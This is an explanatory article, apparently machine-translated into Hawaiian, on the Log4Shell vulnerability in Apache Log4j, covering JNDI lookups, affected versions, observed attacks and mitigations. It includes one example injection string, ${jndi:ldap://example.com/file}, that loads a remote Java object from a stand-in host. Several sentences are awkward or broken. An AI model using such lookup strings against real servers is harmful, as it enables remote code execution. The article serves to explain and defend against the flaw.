Table of Contents[Hūnā][Hōʻike]
I ka hopena o Nowemapa 2021, ua ʻike mākou i kahi hoʻoweliweli nui i ka cybersecurity. Hiki i kēia hana ke hoʻopilikia i nā miliona o nā ʻōnaehana kamepiula ma ka honua holoʻokoʻa.
He alakaʻi kēia e pili ana i ka nāwaliwali o Log4j a pehea e waiho ai kahi hemahema hoʻolālā i nānā ʻole ʻia ma luna o 90% o nā lawelawe kamepiula o ka honua e wehe ana e hoʻouka.
ʻO Apache Log4j kahi mea hoʻohana logging e pili ana i ka Java i hoʻomohala ʻia e ka Apache Software Foundation. Ua kākau mua ʻia e Ceki Gülcü i ka makahiki 2001, he ʻāpana ia o Apache Logging Services, kahi papahana o ka Apache Software Foundation.
Hoʻohana nā ʻoihana a puni ka honua i ka waihona Log4j e hiki ai ke hoʻopaʻa inoa i kā lākou mau noi. ʻO ka ʻoiaʻiʻo, ʻo ka waihona Java ka mea ma nā wahi āpau, hiki iā ʻoe ke loaʻa iā ia ma nā noi mai Amazon, Microsoft, Google, a me nā mea hou aku.
ʻO ke koʻikoʻi o ka waihona, ʻo ia ka hiki ke waiho ʻia nā hapa o ke code i nā miliona o nā kamepiula e wehe i ka hacking. Ma ka lā 24 o Nowemapa 2021, a palekana ao Ua ʻike ka mea noiʻi e hana ana no Alibaba i kahi hemahema weliweli.
ʻO ka vulnerability Log4j, i ʻike ʻia ʻo Log4Shell, i ʻike ʻole ʻia mai ka makahiki 2013. Ua ʻae ka nāwaliwali i nā mea hana ʻino e holo code ma nā ʻōnaehana pili e holo ana i Log4j. Ua hōʻike ʻia ma ka lā 9 Dekemaba, 2021
Ua kapa ʻia ka poʻe loea ʻoihana ʻo Log4Shell flaw the pilikia nui loa i ka hoʻomanaʻo hou.
I ka pule ma hope o ka hoʻolaha ʻana o ka nāwaliwali, ʻike nā hui cybersecurity i nā miliona o ka hoʻouka ʻana. Ua ʻike kekahi poʻe noiʻi i ka nui o hoʻokahi haneli mau hoʻouka ʻana i kēlā me kēia minuke.
Pehea ia hana?
No ka hoʻomaopopo ʻana i ke kumu o ka weliweli loa o Log4Shell, pono mākou e hoʻomaopopo i ka mea hiki iā ia.
Hiki i ka vulnerability Log4Shell ke hoʻokō i nā code arbitrary, ʻo ia hoʻi ka mea hiki i ka mea hoʻouka ke holo i kekahi kauoha a i ʻole code ma kahi mīkini ʻimi.
Pehea e hoʻokō ai i kēia?
ʻO ka mea mua, pono mākou e hoʻomaopopo i ke ʻano o ka JNDI.
ʻO ka Java Naming and Directory Interface (JNDI) he lawelawe Java e hiki ai i nā polokalamu Java ke ʻimi a huli i ka ʻikepili a me nā kumuwaiwai ma o ka inoa. He mea koʻikoʻi kēia mau lawelawe papa kuhikuhi no ka mea hāʻawi lākou i kahi hoʻonohonoho hoʻonohonoho o nā moʻolelo no nā mea hoʻomohala e kuhikuhi maʻalahi i ka wā e hana ai i nā noi.
Hiki i ka JNDI ke hoʻohana i nā protocol like ʻole e komo i kahi papa kuhikuhi. ʻO kekahi o kēia mau protocol ka Lightweight Directory Access Protocol, a i ʻole LDAP.
Ke hoʻopaʻa inoa i kahi kaula, log4j hana i nā hoʻololi string ke hālāwai lākou me nā hōʻike o ke ʻano ${prefix:name}
.
ʻo kahi laʻana, Text: ${java:version}
hiki ke hoʻopaʻa inoa ʻia e like me Text: Java version 1.8.0_65. He mea maʻamau kēia mau ʻano pani.
Hiki iā mākou ke loaʻa nā ʻōlelo e like me Text: ${jndi:ldap://example.com/file}
e hoʻohana ana i ka ʻōnaehana JNDI e hoʻouka i kahi mea Java mai kahi URL ma o ka protocol LDAP.
Hoʻouka pono kēia i ka ʻikepili mai kēlā URL i loko o ka mīkini. Hiki i kekahi mea hacker hiki ke hoʻokipa i nā code malicious ma kahi URL lehulehu a kali i nā mīkini e hoʻohana ana iā Log4j e hoʻopaʻa inoa.
No ka mea, aia ka ʻikepili i hoʻomalu ʻia e ka mea hoʻohana, hiki i nā mea hackers ke hoʻokomo i kā lākou mau kuhikuhi JNDI ponoʻī e kuhikuhi ana i nā kikowaena LDAP a lākou e hoʻomalu ai. Hiki i kēia mau kikowaena LDAP ke piha i nā mea ʻino Java a hiki i ka JNDI ke hoʻokō ma o ka nāwaliwali.
ʻO ka mea i ʻoi aku ka maikaʻi o kēia, ʻaʻole ia he mea nui inā he ʻaoʻao kikowaena ka noi a i ʻole kahi noi ʻaoʻao ʻaoʻao.
ʻOiai aia kahi ala no ka mea logger e heluhelu ai i ka code malicious a ka mea hoʻouka, ua wehe ʻia ka noi no ka hoʻohana.
ʻO wai ka mea i hoʻopili ʻia?
Hoʻopilikia ka vulnerability i nā ʻōnaehana a me nā lawelawe āpau e hoʻohana ana iā APache Log4j, me nā mana 2.0 a hiki i ka 2.14.1.
Manaʻo kekahi mau loea palekana e pili ana ka nāwaliwali i kekahi mau noi e hoʻohana ana iā Java.
Ua ʻike mua ʻia ka hemahema ma ka pāʻani wikiō Minecraft nona ka Microsoft. Ua koi ʻo Microsoft i kā lākou mea hoʻohana e hoʻomaikaʻi i kā lākou polokalamu Java edition Minecraft e pale aku i kekahi pilikia.
Ua ʻōlelo ʻo Jen Easterly, ka Luna Hoʻokele o Cybersecurity a me Infrastructure Security Agency (CISA) he mea kūʻai aku nā mea kūʻai aku. kuleana nui e pale aku i nā mea hoʻohana hope mai nā mea hana ʻino e hoʻohana nei i kēia nāwaliwali.
"Pono e kamaʻilio pū nā mea kūʻai aku me kā lākou mea kūʻai aku e hōʻoia i ka ʻike o nā mea hoʻohana hope i kā lākou huahana i kēia nāwaliwali a pono e hoʻonohonoho mua i ka hoʻonui ʻana i nā polokalamu."
Ua hoʻomaka mua ʻia nā hoʻouka kaua. ʻO Symantec, kahi hui e hāʻawi ana i ka polokalamu cybersecurity, ua nānā i nā ʻano like ʻole o nā noi hoʻouka.
Eia kekahi mau laʻana o nā ʻano hoʻouka kaua i ʻike ʻia e nā mea noiʻi:
- Nā Botnets
ʻO Botnets kahi pūnaewele o nā kamepiula ma lalo o ka mana o kahi hui hoʻouka kaua. Kōkua lākou i ka hana ʻana i nā hoʻouka kaua DDoS, ʻaihue i ka ʻikepili, a me nā scam ʻē aʻe. Ua nānā ka poʻe noiʻi i ka botnet Muhstik i nā ʻōkuhi shell i hoʻoiho ʻia mai ka Log4j exploit.
- XMRig Miner Trojan
ʻO XMRig kahi mea miner cryptocurrency open-source e hoʻohana ana i nā CPU e mine i ka hōʻailona Monero. Hiki i nā Cybercriminals ke hoʻokomo i ka XMRig ma nā polokalamu o ka poʻe i hiki iā lākou ke hoʻohana i kā lākou mana hana me ka ʻole o ko lākou ʻike.
- Khonsari Ransomware
Hoʻopili ʻo Ransomware i kahi ʻano o ka malware i hoʻolālā ʻia e hoʻopili i nā faila ma ke kamepiula. Hiki i nā mea hoʻouka ke koi i ka uku no ka hāʻawi ʻana i ke komo i nā faila i hoʻopili ʻia. Ua ʻike nā mea noiʻi i ka ransomware Khonsari i ka hoʻouka ʻana iā Log4Shell. Huli lākou i nā kikowaena Windows a hoʻohana i ka .NET framework.
He aha ka mea e hana mai ana?
Manaʻo ka poʻe loea he mau mahina a i ʻole mau makahiki paha e hoʻoponopono pono ai i nā haunaele i lawe ʻia e ka vulnerability Log4J.
Hoʻopili kēia kaʻina hana i ka hoʻonui ʻana i kēlā me kēia ʻōnaehana i hoʻopili ʻia me kahi ʻano patched. ʻOiai inā ua paʻi ʻia kēia mau ʻōnaehana āpau, aia nō ka hoʻoweliweli e hiki mai ana i nā puka hope i hoʻohui ʻia e nā mea hackers i ka puka aniani i wehe ʻia nā kikowaena no ka hoʻouka ʻana.
Many nā hoʻonā a me nā hoʻohaʻahaʻa i mea e pale ai i ka hoʻohana ʻia ʻana o nā noi e kēia bug. Ua hoʻololi ka mana hou ʻo Log4j 2.15.0-rc1 i nā hoʻonohonoho like ʻole e hoʻēmi i kēia nāwaliwali.
Hoʻopau ʻia nā hiʻohiʻona a pau e hoʻohana ana iā JNDI ma ka paʻamau a ua kaupalena ʻia nā hiʻohiʻona mamao. ʻO ka hoʻopau ʻana i ka hiʻohiʻona ʻimi ma kāu hoʻonohonoho Log4j e kōkua i ka hōʻemi ʻana i ka pilikia o nā hana hiki.
Ma waho o Log4j, aia nō ka pono o kahi hoʻolālā ākea e pale aku i ka hoʻohana ʻana i ka open-source.
Ma mua o Mei, ua hoʻokuʻu ka Hale Paʻa i kahi ka mana kauoha i manaʻo e hoʻomaikaʻi i ka cybersecurity aupuni. Ua hoʻokomo ʻia kahi hoʻolako no kahi polokalamu lako polokalamu (SBOM) kahi palapala maʻamau i loaʻa kahi papa inoa o nā mea āpau e pono ai ke kūkulu ʻana i ka noi.
Loaʻa kēia i nā ʻāpana e like me ka hamama kumu nā pūʻolo, nā hilinaʻi, a me nā API i hoʻohana ʻia no ka hoʻomohala ʻana. ʻOiai he mea kōkua ka manaʻo o SBOM no ka ʻike maopopo, e kōkua maoli anei ia i ka mea kūʻai?
ʻO ka hoʻomaikaʻi ʻana i nā mea hilinaʻi he pilikia nui paha. Hiki i nā ʻoihana ke koho e uku i nā uku ma mua o ka hoʻopau ʻana i ka manawa hou i ka ʻimi ʻana i nā pūʻolo ʻokoʻa. Malia paha e pono wale kēia mau SBOM inā lākou nui ua kaupalena hou.
Panina
ʻOi aku ka pilikia Log4j ma mua o kahi pilikia ʻenehana no nā hui.
Pono nā alakaʻi ʻoihana e ʻike i nā pilikia e hiki mai ana ke hilinaʻi kā lākou mau kikowaena, huahana, a lawelawe paha i ke code a lākou e mālama ʻole ai.
ʻO ka hilinaʻi ʻana i nā noi open-source a me nā ʻaoʻao ʻekolu e hele mai me ka nui o ka pilikia. Pono nā ʻoihana e noʻonoʻo i ka hana ʻana i nā hoʻolālā hoʻēmi pilikia ma mua o ka hiki ʻana mai o nā hoʻoweliweli hou.
ʻO ka hapa nui o ka pūnaewele e hilinaʻi nei i ka polokalamu open-source i mālama ʻia e nā tausani o nā mea manawaleʻa ma ka honua holoʻokoʻa.
Inā makemake mākou e mālama i ka pūnaewele i kahi palekana, pono nā aupuni a me nā ʻoihana e hoʻolilo i ke kālā i nā hana open source a me nā ʻoihana cybersecurity e like me CISA.
Waiho i ka Reply